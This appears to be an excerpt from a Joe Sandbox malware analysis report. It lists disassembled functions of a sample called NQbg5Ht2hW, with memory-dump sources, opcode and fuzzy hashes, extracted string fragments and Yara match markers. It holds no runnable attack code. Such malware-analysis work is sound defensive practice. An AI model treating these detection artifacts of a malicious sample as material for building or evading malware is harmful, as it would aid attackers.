                                                                                                                                                                                                                                                                        • Instruction ID: cf4f94e98106ef5d157703c3fcf9641a533eb60c063079f88624ae8c54e59d67
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60814672A083D08BE3358B3988517ABBBD2AFE3304F19895DD4C95B686D7794809CB52
                                                                                                                                                                                                                                                                        Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                        • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                                                                                                                                                                                                                        Function 00734031 Relevance: 5.1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: /G$I$7N1@$Fg)i${\}
                                                                                                                                                                                                                                                                        • API String ID: 0-149357369
                                                                                                                                                                                                                                                                        • Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                                        • Instruction ID: 78ca7523c1c73b040ecc2725bfd2b8c4e43702c4e6d5fe5b339d539bc2903873
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 892188B551D3809BD318CF66884161BFBE2BBD2704F29A92DF0C85B255D7748902CF8B
                                                                                                                                                                                                                                                                        Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: ,$i$r}A
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-2114006112
                                                                                                                                                                                                                                                                        • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                                        • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                                                                                                                                                                                                                                        Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: gfff$i$r}A
                                                                                                                                                                                                                                                                        • API String ID: 0-3931832132
                                                                                                                                                                                                                                                                        • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                                                                                                                                                                                        • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                                                                                                                                                                                                                                        Function 00732777 Relevance: 4.2, Strings: 3, Instructions: 454COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: <pr$st$y./
                                                                                                                                                                                                                                                                        • API String ID: 0-3839595785
                                                                                                                                                                                                                                                                        • Opcode ID: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                                        • Instruction ID: 074d2206f41a00f689705fe6483c703fe8e758f3fad41ab2211da7ba9af9f374
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54C13972A083118BE7249F28C85266BB7E1EFD5314F19852DE99697383E73CDD06C392
                                                                                                                                                                                                                                                                        Function 00422510 Relevance: 4.2, Strings: 3, Instructions: 454COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: <pr$st$y./
                                                                                                                                                                                                                                                                        • API String ID: 0-3839595785
                                                                                                                                                                                                                                                                        • Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                                        • Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A
                                                                                                                                                                                                                                                                        Function 0072D5E7 Relevance: 4.2, Strings: 3, Instructions: 453COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 34$C]$|F
                                                                                                                                                                                                                                                                        • API String ID: 0-2804560523
                                                                                                                                                                                                                                                                        • Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                                                                                                                                                                                                                        • Instruction ID: 9611091228218dffde633def4e9c6f595f4d148dc15cf2dd284cc0b72ac973e6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9C1F0B69083618BD720CF28C88166BB3F2FF95314F58895CE8D58B390E779AD05C796
                                                                                                                                                                                                                                                                        Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 34$C]$|F
                                                                                                                                                                                                                                                                        • API String ID: 0-2804560523
                                                                                                                                                                                                                                                                        • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                                        • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                                                                                                                                                                                                                                        Function 00418792 Relevance: 4.1, Strings: 3, Instructions: 378COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #XXL$=$BC
                                                                                                                                                                                                                                                                        • API String ID: 0-2546488661
                                                                                                                                                                                                                                                                        • Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                                        • Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96
                                                                                                                                                                                                                                                                        Function 0074F987 Relevance: 4.1, Strings: 3, Instructions: 364COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 12347$oQ3$sQ3
                                                                                                                                                                                                                                                                        • API String ID: 0-1755585375
                                                                                                                                                                                                                                                                        • Opcode ID: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                                                                                                                                                                                                                                                        • Instruction ID: c5e7d944af1da45dd9df351cc89160cb35e3073080dcd6476cb81ffd8df2854f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16B15772A087518FC728CF28C89196BB7E2EBD5314F1A853CE99697351D735ED01CB82
                                                                                                                                                                                                                                                                        Function 0043F720 Relevance: 4.1, Strings: 3, Instructions: 364COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: 1234$oQ3$sQ3
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-3057079318
                                                                                                                                                                                                                                                                        • Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                                        • Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82
                                                                                                                                                                                                                                                                        Function 0073E250 Relevance: 4.1, Strings: 3, Instructions: 332COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: Ef$TQ][$sWK)
                                                                                                                                                                                                                                                                        • API String ID: 0-3401374238
                                                                                                                                                                                                                                                                        • Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                                        • Instruction ID: bc5268f5e09553fc03f0a0da0183ada454256111f48f09cf819df9b509997430
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB1F47051D3D08EE7398F2994907ABBBE0AFA7304F08499DD4D95B283D779850ACB63
                                                                                                                                                                                                                                                                        Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: Ef$TQ][$sWK)
                                                                                                                                                                                                                                                                        • API String ID: 0-3401374238
                                                                                                                                                                                                                                                                        • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                                                                                                                                                                                        • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                                                                                                                                                                                                                                        Function 0072B547 Relevance: 4.0, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: +|-~$/pqr$_
                                                                                                                                                                                                                                                                        • API String ID: 0-1379640984
                                                                                                                                                                                                                                                                        • Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                                                                                                                                                                                                                        • Instruction ID: e7fa0a534902daa10b4b822e7f49f8fb2983ff4899161209f37c3395b0a23865
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73812C5160459006DB2CDF3888A773BBAD69F84308B2991BEC955CFBA7E93CC542874E
                                                                                                                                                                                                                                                                        Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: +|-~$/pqr$_
                                                                                                                                                                                                                                                                        • API String ID: 0-1379640984
                                                                                                                                                                                                                                                                        • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                                        • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                                                                                                                                                                                                                                        Function 0071092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                        • Instruction ID: 19e97ac46bf6416efbac014f9529ed7ba92719626634cde53c68d324d08253d9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08313CB6900609DFDB10CF99C884AEDBBF9FF48324F15404AD441A7351D7B5EA85CBA4
                                                                                                                                                                                                                                                                        Function 00725FD3 Relevance: 3.8, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: NDNK$WJeX$X
                                                                                                                                                                                                                                                                        • API String ID: 0-3631875968
                                                                                                                                                                                                                                                                        • Opcode ID: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
                                                                                                                                                                                                                                                                        • Instruction ID: e1f625e83518aa45f27767a19dea277b8a7b9ed8c681b4c9a6a7fbc19a50150e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5801DF7091D7A0CFD3B19F25995DA9FBFE4AB93310F20492CC4C9AB211DA3688418B03
                                                                                                                                                                                                                                                                        Function 00425327 Relevance: 3.2, Strings: 2, Instructions: 742COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "51s$9YB
                                                                                                                                                                                                                                                                        • API String ID: 0-2722061943
                                                                                                                                                                                                                                                                        • Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                                        • Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54
                                                                                                                                                                                                                                                                        Function 00731B07 Relevance: 3.2, Strings: 2, Instructions: 655COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: !@$,
                                                                                                                                                                                                                                                                        • API String ID: 0-2321553346
                                                                                                                                                                                                                                                                        • Opcode ID: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                                                                                                                                                                                                                                                        • Instruction ID: b91a595aaa6e468a56d1f0983ec4e2be84cf62d9ae069b0318e5d93148a6ec39
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5842E7B1D042548FEB04CF78C8853AEBFF1AF45310F198669D895AB393D7398946CB92
                                                                                                                                                                                                                                                                        Function 004218A0 Relevance: 3.2, Strings: 2, Instructions: 655COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: !@$,
                                                                                                                                                                                                                                                                        • API String ID: 0-2321553346
                                                                                                                                                                                                                                                                        • Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                                                                                                                                                                                        • Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
